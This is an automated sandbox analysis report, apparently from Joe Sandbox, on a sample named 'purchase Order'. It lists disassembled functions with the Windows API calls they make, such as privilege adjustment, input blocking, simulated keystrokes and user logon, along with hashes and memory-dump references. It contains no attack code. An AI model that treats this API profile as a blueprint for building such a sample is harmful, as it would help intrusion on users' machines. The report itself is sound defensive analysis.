Instruction Fuzzy Hash: 2D11C1B2400204AFE7189F64DCC5E2FB7BCFB44311B20C52EE45A93240DB70FC428A60

Function 00C86685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C866AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00C866EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C866F5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 5c75f3d2e55ccd9b3814059d20dd9914d9b036f845690bb1bc43156ad5e5eaa2
Instruction ID: 223226396c0312465b0baa0d65da6d65f41a10cdd14f4484afe48796310fc989
Opcode Fuzzy Hash: 5c75f3d2e55ccd9b3814059d20dd9914d9b036f845690bb1bc43156ad5e5eaa2
Instruction Fuzzy Hash: 2A11C8B1901228BFE7109BA8DC45FAF77BCEB04718F004556F911E7191D274AE0487E5

Function 00C871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C87223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C8723A
FreeSid.ADVAPI32(?), ref: 00C8724A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: fcd1fb0b57af1dfb9f8238e63069a118a7a781a4344ef4e065501a61d9276d05
Instruction ID: ac621e95a28378be488fde59d3dceb9d05e158e66769b1f16851a649b0dd7c37
Opcode Fuzzy Hash: fcd1fb0b57af1dfb9f8238e63069a118a7a781a4344ef4e065501a61d9276d05
Instruction Fuzzy Hash: 97F0F976A04209BBDB04DBE8DD89FAEBBB8EB08205F104469E602E2191E2709A458B14

Function 00C8F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C8F599
FindClose.KERNEL32(00000000), ref: 00C8F5C9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 99732219b9ea21c57622007cd21cdad3afb59d36872bde093558ad10b71a4d66
Instruction ID: 6642ff5028ee3288877206cac493c50fa4675549f225ae48797baaf943f1c340
Opcode Fuzzy Hash: 99732219b9ea21c57622007cd21cdad3afb59d36872bde093558ad10b71a4d66
Instruction Fuzzy Hash: D411C4316002009FD710EF29D845A2EB3E8FF85325F04892EF8A6D7291CB34BD058B85

Function 00C8CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C9BE6A,?,?,00000000,?), ref: 00C8CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C9BE6A,?,?,00000000,?), ref: 00C8CEB9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e9f637965fd8cbe18a0c4179bf4a2ecc7960294a55cb95bfa60557a3d9b1b89c
Instruction ID: 6bbe98e4d721a7b5156547a7671939e583ab6ff36c8d000619a6be28b35a5b1d
Opcode Fuzzy Hash: e9f637965fd8cbe18a0c4179bf4a2ecc7960294a55cb95bfa60557a3d9b1b89c
Instruction Fuzzy Hash: AEF08C71100229BBDB20ABA4DC89FEA776DBF093A5F008165F91AE6191D7309A40DBA0

Function 00C8411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C84153
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00C84166

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: c04f213f672e06332bd0812fd963ca5d309a6131204548b457f0ef868398c405
Instruction ID: f725d18024f2663c003551e2381d9417ef84d01aa429e28fad038d86c15a33fa
Opcode Fuzzy Hash: c04f213f672e06332bd0812fd963ca5d309a6131204548b457f0ef868398c405
Instruction Fuzzy Hash: 21F0677090024EAFDB059FA0C809BBE7BB0EF00309F00805AF966A6192D77986129FA4

Function 00C7AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C7ACC0), ref: 00C7AB99
CloseHandle.KERNEL32(?,?,00C7ACC0), ref: 00C7ABAB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 1f3eb493546780edfc9b6088569e174b397fd962f121c40494e27b5f695b3910
Instruction ID: 9d140a16378d89d97b72373ddae223eeb74d57a24de44e21ca80da82af2bafc4
Opcode Fuzzy Hash: 1f3eb493546780edfc9b6088569e174b397fd962f121c40494e27b5f695b3910
Instruction Fuzzy Hash: 9CE0E675000510AFE7262F54EC05E77B7E9EF44321710843DF85A81471D762ADD5DB50

Function 00C681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00C66DB3,-0000031A,?,?,00000001), ref: 00C681B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C681BA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a7432760f3799cc8d312d52804df1e367a82837ab52cf61ef9f19b3f96707d74
Instruction ID: fdba757596318862962a40fd30e4a76c1d15bd462be7a6828884e97afb430940
Opcode Fuzzy Hash: a7432760f3799cc8d312d52804df1e367a82837ab52cf61ef9f19b3f96707d74
Instruction Fuzzy Hash: B6B09231044648ABDB002BA1EC09F5C7F78EB48652F094021F60E440718B7294508A92

Function 00C477B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C47921

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: be4431e3d4988df1fa8de3281ee15f25952f1775063dd811e3421fe09f004a4f
Instruction ID: f0cc2b8216e2c38ddb9be12b29d631ec6668506c795c2ecbf74c51133bbfa71a
Opcode Fuzzy Hash: be4431e3d4988df1fa8de3281ee15f25952f1775063dd811e3421fe09f004a4f
Instruction Fuzzy Hash: 87A23C74D04219CFDB24CF59C880BADBBB1FF49314F2582A9E869AB391D7349E81DB50

Function 00C6D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02e419f01516178793901592c21bf59d3d38a4835083bb80c2d775fac4fc1122
Instruction ID: 3b6fd5f166c66378adc0d48a36c48d34fd117ede4827c1792be565adb2a1909b
Opcode Fuzzy Hash: 02e419f01516178793901592c21bf59d3d38a4835083bb80c2d775fac4fc1122
Instruction Fuzzy Hash: 5A321522E29F414DD7335635DC62339A388AFB73C4F15D727E82AB59AADB28C5835100

Function 00C496C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 9fa04629da6fb7fc506929a38e0dded9e288ed0e99547fa9e5cd598e1e904ddc
Instruction ID: cd04c4b830d53d40a4f5e50bd853cdd9095aac233ce67c5aa429af51b64db968
Opcode Fuzzy Hash: 9fa04629da6fb7fc506929a38e0dded9e288ed0e99547fa9e5cd598e1e904ddc
Instruction Fuzzy Hash: B52275716083119FD724DF24C891BABB7E4FF84310F10492DF8AA9B291DB71EA45DB82

Function 00C7038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c34a2f541853ff51d6d2360c1847c2dd1894f93349b09aaaf44ecc22e672c0c
Instruction ID: c34701aa31bcd09a296697eb672eff60962f6e8aefd8a133d0d5fea9b4b9995d
Opcode Fuzzy Hash: 7c34a2f541853ff51d6d2360c1847c2dd1894f93349b09aaaf44ecc22e672c0c
Instruction Fuzzy Hash: 7AB1C220D2AF414DD7239639887133AB75C6FBB2D6F91D71BFC1A74D62EB2195834280

Function 00C8B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C8B6DF

Part of subcall function 00C6344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C8BDC3,00000000,?,?,?,?,00C8BF70,00000000,?), ref: 00C63453
Part of subcall function 00C6344A: __aulldiv.LIBCMT ref: 00C63473

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: b520c457cce20853f8de97039eba16f0b5976da95cb76d06c4c122faf6198cf9
Instruction ID: 15255eabf01cd3ee419e175ed311a15f20a0f262e0acb227c0781f49f7cdaf4e
Opcode Fuzzy Hash: b520c457cce20853f8de97039eba16f0b5976da95cb76d06c4c122faf6198cf9
Instruction Fuzzy Hash: 8721A2726346108BC729CF28C481B92B7E5EB95314B248E7DE0E5CB2C0CB74BE05DB64

Function 00C96AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C96ACA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 7eb75f18ce9eb5e00cb171eb65451d9e0b35c82000b66f0bcbeefda40336d0e2
Instruction ID: 9f4216e21ba12451b5f030736fe49acd22b91d84da9edea3c34f5207782e46d3
Opcode Fuzzy Hash: 7eb75f18ce9eb5e00cb171eb65451d9e0b35c82000b66f0bcbeefda40336d0e2
Instruction Fuzzy Hash: EEE048352002046FD700EF59D404E5AB7ECAFB4755F04C826F946D7291DEB4F8449B90

Function 00C874E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C8750A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: bf4344816decbad961d6480892bafc2b0bce1f3d2febbccb83d3191b71d9984c
Instruction ID: 2ba848d8dfde654539d2ab9f10bd0064a80ff197e9c8fedafc8836221eba1bed
Opcode Fuzzy Hash: bf4344816decbad961d6480892bafc2b0bce1f3d2febbccb83d3191b71d9984c
Instruction Fuzzy Hash: 27D09EA416C60579ED1A27249C1FFB71508F340789FF44749B623D90C0F8E4DE81A639

Function 00C7B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C7AD3E), ref: 00C7B124

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 27d738df7f760a7da80ed426745faee831d8f4c9ce45760a76feb200032d3011
Instruction ID: 340835d26fda8e400293f1ae1861a616374a67b22bc07364ce8fd92c3b94a48a
Opcode Fuzzy Hash: 27d738df7f760a7da80ed426745faee831d8f4c9ce45760a76feb200032d3011
Instruction Fuzzy Hash: B4D09E321A464EAEDF025FA4DC06FAE3F6AEB04701F448511FA16D50A1C675D532AB50

Function 00CBB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00CBB352

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a971f965472b6f6ce3bf6af142389e2e8975910db333bf52cddc72e889a3c8c9
Instruction ID: 7f64fd81416802c87859f1a985b550f0f24946cfa1601f66782a404e160ceb16
Opcode Fuzzy Hash: a971f965472b6f6ce3bf6af142389e2e8975910db333bf52cddc72e889a3c8c9
Instruction Fuzzy Hash: EEC04CB1400109DFC751CBC4C944EEEBBBCAB04301F104091D146F1110D7709B459B72

Function 00C68189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C6818F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 28d7beda655b0dda633cc054ea9504b60cfa5a79c6732f4ce0311146593705e8
Instruction ID: a8e82ef1035bc4d417127a7b6734041722feffe225ef15935e279132beabba20
Opcode Fuzzy Hash: 28d7beda655b0dda633cc054ea9504b60cfa5a79c6732f4ce0311146593705e8
Instruction Fuzzy Hash: 49A0113000020CAB8F002B82EC08A883F2CEA002A0B080022F80E000308B22A8A08A82

Function 00C4E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f3694469823962b15e9bbaeac4b4ffe5c53a4453d3a22355ac8c85a1dfa9b3
Instruction ID: b960cb91ec08db9f7ce9ef0084322727877a0d55e70b85cc35cbec1a1c7d7432
Opcode Fuzzy Hash: 80f3694469823962b15e9bbaeac4b4ffe5c53a4453d3a22355ac8c85a1dfa9b3
Instruction Fuzzy Hash: B922CD74904209CFDB24DF98C480AAEB7F0FF18314F168169ED6A9B351E731AE85DB91

Function 00C493F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcb56a4aea081b2cf69ff7a174727fb12bbca287c10922b9a5f58ba6e530cdc2
Instruction ID: 83dcab7516377d381fe3080028e67239c2f1be0edb4d83662e2ab5331b88443d
Opcode Fuzzy Hash: dcb56a4aea081b2cf69ff7a174727fb12bbca287c10922b9a5f58ba6e530cdc2
Instruction Fuzzy Hash: 9C12BB70A002199FDF04DFA5D985AEEB3F5FF48300F208529E816E7294EB36AE11DB55

Function 00C4AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: b2de1b8f3bcc253f16fb07ae5657b39643cc0c0912a0aae36d01b274fd2f1b68
Instruction ID: 1ea4e6ec95db1d7739909e3eca48b1bc8ac49eef95f52d42c49ab89f084370f8
Opcode Fuzzy Hash: b2de1b8f3bcc253f16fb07ae5657b39643cc0c0912a0aae36d01b274fd2f1b68
Instruction Fuzzy Hash: D302C1B0A00209DFDF18DF68D991AAEBBB5FF48300F108469E806DB255EB31DE55DB91

Function 00C602A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
